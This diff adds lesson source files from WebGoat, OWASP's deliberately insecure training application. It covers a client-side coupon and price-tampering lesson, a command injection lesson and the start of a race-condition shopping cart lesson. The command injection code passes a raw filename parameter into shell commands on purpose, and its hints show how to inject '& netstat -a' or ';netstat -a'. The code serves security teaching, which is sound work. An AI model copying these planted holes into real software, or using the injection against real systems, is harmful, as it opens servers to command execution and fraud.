+		input = new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter(
+				"QTY2", "0"));
+
+		input.setOnKeyUp("updateTotals();");
+		input.setSize(10);
+		tr.addElement(new TD().addElement(input).setAlign("right"));
+
+		tr.addElement(new TD().addElement(
+				new Input(Input.TEXT, "TOT2", s.getParser().getStringParameter(
+						"TOT2", "0")).setSize(10).setReadOnly(true)).setAlign("right"));
+
+		t.addElement(tr);
+		tr = new TR();
+		tr
+				.addElement(new TD()
+						.addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™"));
+
+
+		tr.addElement(new TD().addElement(
+				new Input(Input.TEXT, "PRC3", s.getParser().getStringParameter(
+						"PRC3", "1599.99")).setSize(10).setReadOnly(true))
+				.setAlign("right"));
+
+		input = new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter(
+				"QTY3", "0"));
+
+		input.setOnKeyUp("updateTotals();");
+		input.setSize(10);
+		tr.addElement(new TD().addElement(input).setAlign("right"));
+
+
+		tr.addElement(new TD().addElement(
+				new Input(Input.TEXT, "TOT3", s.getParser().getStringParameter(
+						"TOT3", "0")).setSize(10).setReadOnly(true)).setAlign("right"));
+
+		t.addElement(tr);
+		tr = new TR();
+		tr
+				.addElement(new TD()
+						.addElement("3 - Year Performance Service Plan $1000 and Over "));
+
+
+		tr
+				.addElement(new TD().addElement(
+						new Input(Input.TEXT, "PRC4", s.getParser()
+								.getStringParameter("PRC4", "299.99")).setSize(10)
+								.setReadOnly(true)).setAlign("right"));
+
+		input = new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter(
+				"QTY4", "0"));
+
+		input.setOnKeyUp("updateTotals();");
+		input.setSize(10);
+		tr.addElement(new TD().addElement(input).setAlign("right"));
+
+
+		tr.addElement(new TD().addElement(
+				new Input(Input.TEXT, "TOT4", s.getParser().getStringParameter(
+						"TOT4", "0")).setSize(10).setReadOnly(true)).setAlign("right"));
+
+		t.addElement(tr);
+		ec.addElement(t);
+		return ec;
+	}
+
+		protected Category getDefaultCategory() {
+		return Category.AJAX_SECURITY;
+	}
+
+	/**
+	 * Gets the hints attribute of the AccessControlScreen object
+	 *
+	 * @return The hints value
+	 */
+
+
+	public List<String> getHints(WebSession s)
+	    {
+		List<String> hints = new ArrayList<String>();
+
+
+
+
+		hints.add("Use Firebug to examine the JavaScript.");
+
+		hints.add("Using Firebug, you can add breakpoints in the JavaScript.");
+
+		hints.add("Use Firebug to find the array of encrypted coupon codes, and " +
+				"step through the JavaScript to see the decrypted values.");
+
+		hints.add("You can use Firebug to inspect (and modify) the HTML.");
+
+		hints.add("Use Firebug to remove the 'readonly' attribute from the input next to " +
+				"'The total charged to your credit card:' and set the value to 0.");
+
+
+
+		return hints;
+
+	}
+
+	/**
+	 * Gets the instructions attribute of the WeakAccessControl object
+	 *
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s) {
+		String instructions = "";
+
+		if (getLessonTracker(s).getStage() == 1) {
+			instructions = "STAGE 1:\tFor this exercise, your mission is to discover a coupon code to receive an unintended discount.";
+		}
+		else if (getLessonTracker(s).getStage() == 2) {
+			instructions = "STAGE 2:\tNow, try to get your entire order for free.";
+		}
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(120);
+
+	protected Integer getDefaultRanking() {
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the AccessControlScreen object
+	 *
+	 * @return The title value
+	 */
+	public String getTitle() {
+		return "Insecure Client Storage";
+	}
+
+	public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java
new file mode 100644
index 000000000..0fd458fd7
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java
@@ -0,0 +1,353 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.File;
+import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.List;
+import java.util.StringTokenizer;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.P;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.Exec;
+import org.owasp.webgoat.util.ExecResults;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public class CommandInjection extends LessonAdapter
+{
+    private final static String HELP_FILE = "HelpFile";
+
+    private String osName = System.getProperty("os.name");
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	boolean illegalCommand = getWebgoatContext().isDefuseOSCommands();
+	try
+	{
+	    String helpFile = s.getParser().getRawParameter(HELP_FILE,
+		    "BasicAuthentication.help");
+	    if (getWebgoatContext().isDefuseOSCommands()
+		    && (helpFile.indexOf('&') != -1 || helpFile.indexOf(';') != -1))
+	    {
+		int index = helpFile.indexOf('&');
+		if (index == -1)
+		{
+		    index = helpFile.indexOf(';');
+		}
+		index = index + 1;
+		int helpFileLen = helpFile.length() - 1; // subtract 1 for the closing quote
+		System.out.println("Command = ["
+			+ helpFile.substring(index, helpFileLen).trim()
+				.toLowerCase() + "]");
+		if ((osName.indexOf("Windows") != -1 && (helpFile.substring(
+			index, helpFileLen).trim().toLowerCase().equals(
+			"netstat -a")
+			|| helpFile.substring(index, helpFileLen).trim()
+				.toLowerCase().equals("dir")
+			|| helpFile.substring(index, helpFileLen).trim()
+				.toLowerCase().equals("ls")
+			|| helpFile.substring(index, helpFileLen).trim()
+				.toLowerCase().equals("ifconfig") || helpFile
+			.substring(index, helpFileLen).trim().toLowerCase()
+			.equals("ipconfig")))
+			|| (helpFile.substring(index, helpFileLen).trim()
+				.toLowerCase().equals("netstat -a #")
+				|| helpFile.substring(index, helpFileLen)
+					.trim().toLowerCase().equals("dir #")
+				|| helpFile.substring(index, helpFileLen)
+					.trim().toLowerCase().equals("ls #")
+				|| helpFile.substring(index, helpFileLen)
+					.trim().toLowerCase().equals("ls -l #")
+				|| helpFile.substring(index, helpFileLen)
+					.trim().toLowerCase().equals(
+						"ifconfig #") || helpFile
+				.substring(index, helpFileLen).trim()
+				.toLowerCase().equals("ipconfig #")))
+		{
+		    illegalCommand = false;
+		}
+		else
+		{
+		    s
+			    .setMessage("It appears that you are on the right track.  "
+				    + "Commands that may compromise the operating system have been disabled.  "
+				    + "The following commands are allowed: netstat -a, dir, ls, ifconfig, and ipconfig");
+		}
+	    }
+
+	    if (getWebgoatContext().isDefuseOSCommands() && helpFile.indexOf('&') == -1
+		    && helpFile.indexOf(';') == -1)
+	    {
+		if (helpFile.length() > 0)
+		{
+		    if (upDirCount(helpFile) <= 3)
+		    {
+			// FIXME: This value isn't used.  What is the goal here?
+			s.getContext().getRealPath("/");
+			illegalCommand = false;
+		    }
+		    else
+		    {
+			s
+				.setMessage("It appears that you are on the right track.  "
+					+ "Commands that may compromise the operating system have been disabled.  "
+					+ "This lesson is a command injection lesson, not access control.");
+		    }
+		}
+		else
+		{
+		    // No Command entered.
+		    illegalCommand = false;
+		}
+	    }
+	    File safeDir = new File(s.getContext().getRealPath("/lesson_plans"));
+
+	    ec
+		    .addElement(new StringElement(
+			    "You are currently viewing: <b>"
+				    + (helpFile.toString().length() == 0 ? "&lt;select file from list below&gt;"
+					    : helpFile.toString()) + "</b>"));
+
+	    if (!illegalCommand)
+	    {
+		String results;
+		String fileData = null;
+		helpFile = helpFile.replaceAll("\\.help", "\\.html");
+
+		if (osName.indexOf("Windows") != -1)
+		{
+		    // Add quotes around the filename to avoid having special characters in DOS filenames
+		    results = exec(s, "cmd.exe /c dir /b \""
+			    + safeDir.getPath() + "\"");
+		    fileData = exec(s, "cmd.exe /c type \""
+			    + new File(safeDir, helpFile).getPath() + "\"");
+
+		}
+		else
+		{
+		    String[] cmd1 = { "/bin/sh", "-c",
+			    "ls \"" + safeDir.getPath() + "\"" };
+		    results = exec(s, cmd1);
+		    String[] cmd2 = {
+			    "/bin/sh",
+			    "-c",
+			    "cat \"" + new File(safeDir, helpFile).getPath()
+				    + "\"" };
+		    fileData = exec(s, cmd2);
+		}
+
+		ec.addElement(new P()
+			.addElement("Select the lesson plan to view: "));
+		ec.addElement(ECSFactory.makePulldown(HELP_FILE,
+			parseResults(results.replaceAll("(?s)\\.html",
+				"\\.help"))));
+		//ec.addElement( results );
+		Element b = ECSFactory.makeButton("View");
+		ec.addElement(b);
+		// Strip out some of the extra html from the "help" file
+		ec.addElement(new BR());
+		ec.addElement(new BR());
+		ec.addElement(new HR().setWidth("90%"));
+		ec.addElement(new StringElement(fileData.replaceAll(
+			System.getProperty("line.separator"), "<br>")
+			.replaceAll("(?s)<!DOCTYPE.*/head>", "").replaceAll(
+				"<br><br>", "<br>").replaceAll("<br>\\s<br>",
+				"<br>")));
+
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    private String parseResults(String results)
+    {
+    	results.replaceAll("(?s).*Output...\\s", "").replaceAll("(?s)Returncode.*", "");
+    	StringTokenizer st = new StringTokenizer(results, "\n");
+    	StringBuffer modified = new StringBuffer();
+    	
+    	while(st.hasMoreTokens())
+    	{
+    		String s = (String)st.nextToken().trim();
+    		
+    		if(s.length() > 0 && s.endsWith(".help"))
+    		{
+    			modified.append(s + "\n");
+    		}
+    	}
+    	
+    	return modified.toString();
+    }
+
+
+    public static int upDirCount(String fileName)
+    {
+	int count = 0;
+	// check for "." = %2d  
+	// we wouldn't want anyone bypassing the check by useing encoding :)
+	// FIXME: I don't think hex endoing will work here.
+	fileName = fileName.replaceAll("%2d", ".");
+	int startIndex = fileName.indexOf("..");
+	while (startIndex != -1)
+	{
+	    count++;
+	    startIndex = fileName.indexOf("..", startIndex + 1);
+	}
+	return count;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  command  Description of the Parameter
+     * @param  s        Description of the Parameter
+     * @return          Description of the Return Value
+     */
+    private String exec(WebSession s, String command)
+    {
+	System.out.println("Executing OS command: " + command);
+	ExecResults er = Exec.execSimple(command);
+	if ((command.indexOf("&") != -1 || command.indexOf(";") != -1)
+		&& !er.getError())
+	{
+	    makeSuccess(s);
+	}
+
+	return (er.toString());
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  command  Description of the Parameter
+     * @param  s        Description of the Parameter
+     * @return          Description of the Return Value
+     */
+    private String exec(WebSession s, String[] command)
+    {
+	System.out.println("Executing OS command: " + Arrays.asList(command));
+	ExecResults er = Exec.execSimple(command);
+	if (!er.getError())
+	{
+	    makeSuccess(s);
+	}
+
+	return (er.toString());
+    }
+
+    /**
+     *  Gets the category attribute of the CommandInjection object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.INJECTION;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the DirectoryScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("The application is using a system command to return the contents of a file.");
+	hints
+		.add("The ampersand(&) separates commands in the Windows 2000 command shell. In Unix the separator is typically a semi-colon(;)");
+	hints
+		.add("Use a proxy to insert & netstat -a on Windows or ;netstat -a on Unix.");
+	hints
+		.add("Note that the server may enclose the submitted file name within quotes");
+
+	return hints;
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the ParameterInjection object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "Choose the lesson plan you would like to view.  "
+		+ "Try to inject a command to the operating system.";
+
+	return (instructions);
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(40);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the DirectoryScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return "Command Injection";
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java
new file mode 100644
index 000000000..8184975f9
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java
@@ -0,0 +1,610 @@
+package org.owasp.webgoat.lessons;
+
+import java.text.NumberFormat;
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Locale;
+import java.util.regex.Pattern;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Ryan Knell <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    July, 23 2007
+ */
+
+public class ConcurrencyCart extends LessonAdapter
+{
+	//Shared Variables
+	private static int total = 0;
+    private static float runningTOTAL = 0;
+    private static int subTOTAL = 0;
+    private static float calcTOTAL = 0;
+    private static int quantity1 = 0;
+    private static int quantity2 = 0;
+    private static int quantity3 = 0;
+    private static int quantity4 = 0;
+    private float ratio = 0;
+    private int discount = 0;
+    
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+	
+	protected Element createContent(WebSession s)
+    {
+    	ElementContainer ec = null;
+    	  	   	
+    	try
+    	{
+    		String submit = s.getParser().getStringParameter("SUBMIT");
+    	    	   		  				
+	    		if("Purchase".equalsIgnoreCase(submit))
+	    		{
+	    			updateQuantity(s);
+	    			ec = createPurchaseContent(s, quantity1, quantity2, quantity3, quantity4);
+	    		}
+	    		else if ("Confirm".equalsIgnoreCase(submit))
+	    		{
+	    			ec = confirmation(s, quantity1, quantity2, quantity3, quantity4);
+	    			
+	    			//Discount
+	    			
+				if (calcTOTAL == 0) // No total cost for items
+				{
+				discount = 0; // Discount meaningless
+				}
+				else // The expected case -- items cost something
+				{
+					ratio = runningTOTAL / calcTOTAL;
+				}
+
+
+				if (calcTOTAL > runningTOTAL)
+	    		    {
+	    				//CONGRATS
+						discount = (int) (100 * (1 - ratio));
+						s.setMessage("Thank you for shopping! You have (illegally!) received a " + discount +"% discount. Police are on the way to your IP address.");
+	    			    	    			    
+	    		    	makeSuccess(s);
+	    		    }
+				else if (calcTOTAL < runningTOTAL)
+	    			{
+	    				//ALMOST
+					  discount = (int) (100 * (ratio - 1));
+					  s.setMessage("You are on the right track, but you actually overpaid by " + discount + "%. Try again!");
+	    			}
+	    		}
+	    		else
+	    		{
+	    			updateQuantity(s);
+	    			ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4);
+	    		}
+	    			
+    	}
+    	catch (ParameterNotFoundException pnfe)
+    	{
+    		System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage");
+    		ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4);
+    	}
+    	
+    	return ec;
+    }
+	
+	//UPDATE QUANTITY VARIABLES
+	private void updateQuantity(WebSession s)
+	{
+		quantity1 = thinkPositive(s.getParser().getIntParameter("QTY1", 0));
+		quantity2 = thinkPositive(s.getParser().getIntParameter("QTY2", 0));
+		quantity3 = thinkPositive(s.getParser().getIntParameter("QTY3", 0));
+		quantity4 = thinkPositive(s.getParser().getIntParameter("QTY4", 0));
+	}
+	
+    /*
+     **********************************************************************
+     ******************* PURCHASING PAGE **********************************
+     **********************************************************************
+     */
+	
+    private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
+    {
+    
+    	ElementContainer ec = new ElementContainer();
+    	runningTOTAL = 0;
+       	     
+   	String regex1 = "^[0-9]{3}$";// any three digits	
+	Pattern pattern1 = Pattern.compile(regex1);
+	
+	try
+	{
+	    String param1 = s.getParser().getRawParameter("PAC", "111");
+	    String param2 = HtmlEncoder.encode(s.getParser().getRawParameter(
+		    "CC", "5321 1337 8888 2007"));
+	    
+	    // test input field1
+	    if (!pattern1.matcher(param1).matches())
+	    {
+		s.setMessage("Error! You entered " + HtmlEncoder.encode(param1) + " instead of your 3 digit code.  Please try again.");
+	    }
+	    	  
+	    ec.addElement(new HR().setWidth("90%"));
+	    ec.addElement(new Center().addElement(new H1().addElement("Place your order ")));
+	    Table table = new Table().setCellSpacing(0).setCellPadding(2)
+		    .setBorder(1).setWidth("90%").setAlign("center");
+
+	    if (s.isColor())  
+	       {  table.setBorder(1);  }
+        
+	    //Table Setup
+	    TR tr = new TR();
+	       tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
+	       tr.addElement(new TH().addElement("Price").setWidth("10%"));
+	       tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+	       tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
+	    table.addElement(tr);
+	    
+	    //Item 1
+	       tr = new TR();   //Create a new table object
+	       tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
+	       tr.addElement(new TD().addElement("$169.00").setAlign("right"));
+	       tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center"));
+	        
+		    total = quantity1 * 169;
+		    runningTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);  //Adds table to the HTML
+	    
+	    //Item 2
+	       tr = new TR();
+	       tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
+	       tr.addElement(new TD().addElement("$299.00").setAlign("right"));
+	       tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center"));
+	        
+		    total = quantity2 * 299;
+		    runningTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);
+	    
+	    //Item 3
+ 	      tr = new TR();
+	      tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
+	      tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
+	      tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center"));
+	    
+		    total = quantity3 * 1799;
+		    runningTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);
+	    
+	    //Item 4
+	      tr = new TR();
+	      tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
+	      tr.addElement(new TD().addElement("$649.00").setAlign("right"));
+	      tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center"));
+	    
+		    total = quantity4 * 649;
+		    runningTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);
+
+	    ec.addElement(table);
+
+	    table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+		    .setWidth("90%").setAlign("center");
+
+	    if (s.isColor())   {  table.setBorder(1); }
+
+	    ec.addElement(new BR());
+
+	    calcTOTAL = runningTOTAL;
+	    
+	    //Total Charged
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Total:"));
+		    tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right"));
+		    table.addElement(tr);
+		    
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		    table.addElement(tr);
+	    
+	    //Credit Card Input
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Enter your credit card number:"));
+		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "CC", param2)).setAlign("right"));
+		    table.addElement(tr);
+	    
+	    //PAC Input
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Enter your three digit access code:"));
+		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "PAC", param1)).setAlign("right"));
+		    table.addElement(tr);
+
+	    //Confirm Button
+		    Element b = ECSFactory.makeButton("Confirm");
+		    tr = new TR();
+		    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
+		    table.addElement(tr);
+	    
+	    //Cancel Button
+		    Element c = ECSFactory.makeButton("Cancel");
+		    tr = new TR();
+		    tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right"));
+		    table.addElement(tr);
+
+	    ec.addElement(table);
+	    ec.addElement(new BR());
+	    
+	}
+		catch (Exception e)
+		{
+		    s.setMessage("Error generating " + this.getClass().getName());
+		    e.printStackTrace();
+		}
+		
+	return (ec);
+    }
+    
+    /*
+     **********************************************************************
+     ******************* CONFIRMATION PAGE ********************************
+     **********************************************************************
+     */
+    
+    private ElementContainer confirmation (WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
+    {
+    	ElementContainer ec = new ElementContainer();
+    	
+    	final String confNumber = "CONC-88";
+	calcTOTAL = 0;
+    	try
+    	{
+	//Thread.sleep(5000);
+    	    
+    	ec.addElement(new HR().setWidth("90%"));
+	    ec.addElement(new Center().addElement(new H1().addElement("Thank you for your purchase!")));
+	    ec.addElement(new Center().addElement(new H1().addElement("Confirmation number: " + confNumber)));
+	    Table table = new Table().setCellSpacing(0).setCellPadding(2)
+		    .setBorder(1).setWidth("90%").setAlign("center");
+
+	    if (s.isColor())  
+	       {  table.setBorder(1);  }
+        
+	    //Table Setup
+		    TR tr = new TR();
+		    tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
+		    tr.addElement(new TH().addElement("Price").setWidth("10%"));
+		    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+		    tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
+		    table.addElement(tr);
+	    
+	    //Item 1
+		    tr = new TR();   //Create a new table object
+		    tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
+		    tr.addElement(new TD().addElement("$169.00").setAlign("right"));
+		    tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center"));
+	    
+		    total = quantity1 * 169;
+		    calcTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);  //Adds table to the HTML
+	    
+	    //Item 2
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
+		    tr.addElement(new TD().addElement("$299.00").setAlign("right"));
+		    tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center"));
+	      
+		    total = quantity2 * 299;
+		    calcTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);
+	    
+	    //Item 3
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
+		    tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
+		    tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center"));
+	      
+		    total = quantity3 * 1799;
+		    calcTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);
+	    
+	    //Item 4
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
+		    tr.addElement(new TD().addElement("$649.00").setAlign("right"));
+		    tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center"));
+	     
+		    total = quantity4 * 649;
+		    calcTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);
+
+	    ec.addElement(table);
+
+	    table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+		    .setWidth("90%").setAlign("center");
+
+	    if (s.isColor())  
+	       {  table.setBorder(1); }
+
+	    ec.addElement(new BR());
+
+	    //Total Charged
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Total Amount Charged to Your Credit Card:"));
+		    tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right"));
+		    table.addElement(tr);
+	    
+	    tr = new TR();
+	    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+	    table.addElement(tr);
+	    
+	    //Return to Store Button
+		    Element b = ECSFactory.makeButton("Return to Store");
+		    tr = new TR();
+		    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center"));
+		    table.addElement(tr);
+
+	    ec.addElement(table);
+	    ec.addElement(new BR());
+	   	    
+	}
+			catch (Exception e)
+			{
+			    s.setMessage("Error generating " + this.getClass().getName());
+			    e.printStackTrace();
+			}
+	return (ec);
+    }
+    
+    /*
+     **********************************************************************
+     ******************* SHOPPING PAGE **********************************
+     **********************************************************************
+     */
+    
+    private ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
+    {
+    	    	
+    ElementContainer ec = new ElementContainer();
+    subTOTAL = 0;
+
+	try
+	{
+	    
+	    ec.addElement(new HR().setWidth("90%"));
+	    ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
+	    Table table = new Table().setCellSpacing(0).setCellPadding(2)
+		    .setBorder(1).setWidth("90%").setAlign("center");
+
+	    if (s.isColor())  
+	       {  table.setBorder(1);  }
+        
+	    //Table Setup
+		    TR tr = new TR();
+		    tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
+		    tr.addElement(new TH().addElement("Price").setWidth("10%"));
+		    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+		    tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
+		    table.addElement(tr);
+	    
+	    //Item 1
+		    tr = new TR();   //Create a new table object
+		    tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
+		    tr.addElement(new TD().addElement("$169.00").setAlign("right"));
+		    tr.addElement(new TD().addElement(
+				new Input(Input.TEXT, "QTY1", String.valueOf(quantity1)))
+			    .setAlign("right"));
+		    
+		    total = quantity1 * 169;
+		    subTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);  //Adds table to the HTML
+	    
+	    //Item 2
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
+		    tr.addElement(new TD().addElement("$299.00").setAlign("right"));
+		    tr.addElement(new TD().addElement(
+			    new Input(Input.TEXT, "QTY2", String.valueOf(quantity2)))
+			    .setAlign("right"));
+		    
+		    total = quantity2 * 299;
+		    subTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);
+	    
+	    //Item 3
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
+		    tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
+		    tr.addElement(new TD().addElement(
+			    new Input(Input.TEXT, "QTY3", String.valueOf(quantity3)))
+			    .setAlign("right"));
+		    
+		    total = quantity3 * 1799;
+		    subTOTAL += total;
+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);
+	    
+	    //Item 4
+		    tr = new TR();
+		    tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
+		    tr.addElement(new TD().addElement("$649.00").setAlign("right"));
+		    tr.addElement(new TD().addElement(
+			    new Input(Input.TEXT, "QTY4", String.valueOf(quantity4)))
+			    .setAlign("right"));
+		    
+		    total = quantity4 * 649;
+		    subTOTAL += total;
